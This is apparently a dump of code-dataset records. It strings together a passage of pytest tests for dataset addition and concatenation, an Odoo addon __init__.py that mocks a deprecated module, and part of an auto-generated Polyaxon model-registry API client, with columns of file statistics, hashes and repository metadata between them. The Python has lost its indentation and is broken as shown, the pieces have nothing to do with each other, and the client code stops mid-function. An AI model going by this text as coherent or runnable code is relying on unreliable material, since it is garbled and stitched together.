def test_add_dataset(self):
dataset_1 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_2 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_3 = ArrayDataset(np.random.rand(7, 3, 28, 28))
result = dataset_1 + dataset_2 + dataset_3
assert len(result) == 21
assert result.cumulative_size == (14, 21)
assert np.absolute(dataset_1[0][0] - result[0][0]).sum() == 0
assert np.absolute(dataset_2[0][0] - result[7][0]).sum() == 0
assert np.absolute(dataset_3[0][0] - result[14][0]).sum() == 0
def test_cat_dataset(self):
dataset_1 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_2 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_3 = ArrayDataset(np.random.rand(7, 3, 28, 28))
result = dataset_1.cat(dataset_2, dataset_3)
assert len(result) == 21
assert result.cumulative_size == (7, 14, 21)
assert np.absolute(dataset_1[0][0] - result[0][0]).sum() == 0
assert np.absolute(dataset_2[0][0] - result[7][0]).sum() == 0
assert np.absolute(dataset_3[0][0] - result[14][0]).sum() == 0
def test_cat_add_dataset(self):
dataset_1 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_2 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_3 = ArrayDataset(np.random.rand(7, 3, 28, 28))
result = dataset_1.cat(dataset_2 + dataset_3)
assert len(result) == 21
assert result.cumulative_size == (7, 21)
assert np.absolute(dataset_1[0][0] - result[0][0]).sum() == 0
assert np.absolute(dataset_2[0][0] - result[7][0]).sum() == 0
assert np.absolute(dataset_3[0][0] - result[14][0]).sum() == 0
def test_add_cat_dataset(self):
dataset_1 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_2 = ArrayDataset(np.random.rand(7, 3, 28, 28))
dataset_3 = ArrayDataset(np.random.rand(7, 3, 28, 28))
result = dataset_1 + dataset_2.cat(dataset_3)
assert len(result) == 21
assert result.cumulative_size == (7, 21)
assert np.absolute(dataset_1[0][0] - result[0][0]).sum() == 0
assert np.absolute(dataset_2[0][0] - result[7][0]).sum() == 0
assert np.absolute(dataset_3[0][0] - result[14][0]).sum() == 0
def test_add_non_sized_raises(self):
with pytest.raises(TypeError):
_ = ConcreteSizedDataset([0, 1]) + ConcreteDataset([2, 3])
with pytest.raises(TypeError):
_ = ConcreteDataset([0, 1]) + ConcreteSizedDataset([2, 3])
| 34.818966
| 86
| 0.576752
| 1,016
| 8,078
| 4.441929
| 0.079724
| 0.074452
| 0.077997
| 0.066475
| 0.831819
| 0.782406
| 0.748061
| 0.748061
| 0.748061
| 0.731221
| 0
| 0.073443
| 0.280267
| 8,078
| 231
| 87
| 34.969697
| 0.702786
| 0.006685
| 0
| 0.740331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.353591
| 1
| 0.121547
| false
| 0
| 0.016575
| 0.027624
| 0.187845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71b16f2ea19ada1d4d81daf7eeb18de3c699cb85
| 175
|
py
|
Python
|
web/addons/web/__init__.py
|
diogocs1/comps
|
63df07f6cf21c41e4527c06e2d0499f23f4322e7
|
[
"Apache-2.0"
] | 1
|
2019-12-29T11:53:56.000Z
|
2019-12-29T11:53:56.000Z
|
odoo/addons/web/__init__.py
|
tuanquanghpvn/odoo8-tutorial
|
52d25f1ca5f233c431cb9d3b24b79c3b4fb5127e
|
[
"MIT"
] | null | null | null |
odoo/addons/web/__init__.py
|
tuanquanghpvn/odoo8-tutorial
|
52d25f1ca5f233c431cb9d3b24b79c3b4fb5127e
|
[
"MIT"
] | 3
|
2020-10-08T14:42:10.000Z
|
2022-01-28T14:12:29.000Z
|
import sys
# Mock deprecated openerp.addons.web.http module
import openerp.http
sys.modules['openerp.addons.web.http'] = openerp.http
http = openerp.http
import controllers
| 19.444444
| 53
| 0.794286
| 25
| 175
| 5.56
| 0.44
| 0.23741
| 0.230216
| 0.28777
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108571
| 175
| 8
| 54
| 21.875
| 0.891026
| 0.262857
| 0
| 0
| 0
| 0
| 0.181102
| 0.181102
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e0b365e217b6ab202cc1f4fd1aec3637b616d482
| 153,583
|
py
|
Python
|
sdks/python/http_client/v1/polyaxon_sdk/api/model_registry_v1_api.py
|
vishalbelsare/polyaxon
|
aa02c6a62f7c0ef64eed048d9f3ba2be92984b6c
|
[
"Apache-2.0"
] | null | null | null |
sdks/python/http_client/v1/polyaxon_sdk/api/model_registry_v1_api.py
|
vishalbelsare/polyaxon
|
aa02c6a62f7c0ef64eed048d9f3ba2be92984b6c
|
[
"Apache-2.0"
] | 51
|
2021-04-06T07:59:21.000Z
|
2022-03-29T01:08:22.000Z
|
sdks/python/http_client/v1/polyaxon_sdk/api/model_registry_v1_api.py
|
vishalbelsare/polyaxon
|
aa02c6a62f7c0ef64eed048d9f3ba2be92984b6c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Polyaxon SDKs and REST API specification.
Polyaxon SDKs and REST API specification. # noqa: E501
The version of the OpenAPI document: 1.8.4
Contact: contact@polyaxon.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from polyaxon_sdk.api_client import ApiClient
from polyaxon_sdk.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class ModelRegistryV1Api(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def archive_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Archive registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.archive_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.archive_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def archive_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Archive registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.archive_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method archive_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `archive_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `archive_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/archive', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def bookmark_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Bookmark registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bookmark_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.bookmark_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def bookmark_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Bookmark registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.bookmark_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method bookmark_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `bookmark_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `bookmark_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/bookmark', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_model_registry(self, owner, body, **kwargs): # noqa: E501
"""Create registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_registry(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1ModelRegistry body: Model body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_model_registry_with_http_info(owner, body, **kwargs) # noqa: E501
def create_model_registry_with_http_info(self, owner, body, **kwargs): # noqa: E501
"""Create registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_registry_with_http_info(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1ModelRegistry body: Model body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_model_registry`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/create', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_model_version(self, owner, model, body, **kwargs): # noqa: E501
"""Create model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_version(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelVersion body: Model version body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_model_version_with_http_info(owner, model, body, **kwargs) # noqa: E501
def create_model_version_with_http_info(self, owner, model, body, **kwargs): # noqa: E501
"""Create model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_version_with_http_info(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelVersion body: Model version body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelVersion, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_model_version`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `create_model_version`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/versions', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelVersion', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_model_version_stage(self, owner, entity, name, body, **kwargs): # noqa: E501
"""Create new model version stage # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_version_stage(owner, entity, name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity namespace (required)
:param str name: Name of the version to apply the stage to (required)
:param V1EntityStageBodyRequest body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Stage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_model_version_stage_with_http_info(owner, entity, name, body, **kwargs) # noqa: E501
def create_model_version_stage_with_http_info(self, owner, entity, name, body, **kwargs): # noqa: E501
"""Create new model version stage # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_model_version_stage_with_http_info(owner, entity, name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity namespace (required)
:param str name: Name of the version to apply the stage to (required)
:param V1EntityStageBodyRequest body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Stage, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'entity',
'name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_model_version_stage" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `create_model_version_stage`") # noqa: E501
# verify the required parameter 'entity' is set
if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501
local_var_params['entity'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `entity` when calling `create_model_version_stage`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `create_model_version_stage`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `create_model_version_stage`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'entity' in local_var_params:
path_params['entity'] = local_var_params['entity'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{entity}/versions/{name}/stages', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Stage', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_model_registry(self, owner, name, **kwargs): # noqa: E501
"""Delete registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_model_registry(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_model_registry_with_http_info(owner, name, **kwargs) # noqa: E501
def delete_model_registry_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""Delete registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_model_registry_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Component under namesapce (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `delete_model_registry`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_model_version(self, owner, entity, name, **kwargs): # noqa: E501
"""Delete model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_model_version(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_model_version_with_http_info(owner, entity, name, **kwargs) # noqa: E501
def delete_model_version_with_http_info(self, owner, entity, name, **kwargs): # noqa: E501
"""Delete model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_model_version_with_http_info(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'entity',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_model_version" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `delete_model_version`") # noqa: E501
# verify the required parameter 'entity' is set
if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501
local_var_params['entity'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `entity` when calling `delete_model_version`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_model_version`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'entity' in local_var_params:
path_params['entity'] = local_var_params['entity'] # noqa: E501
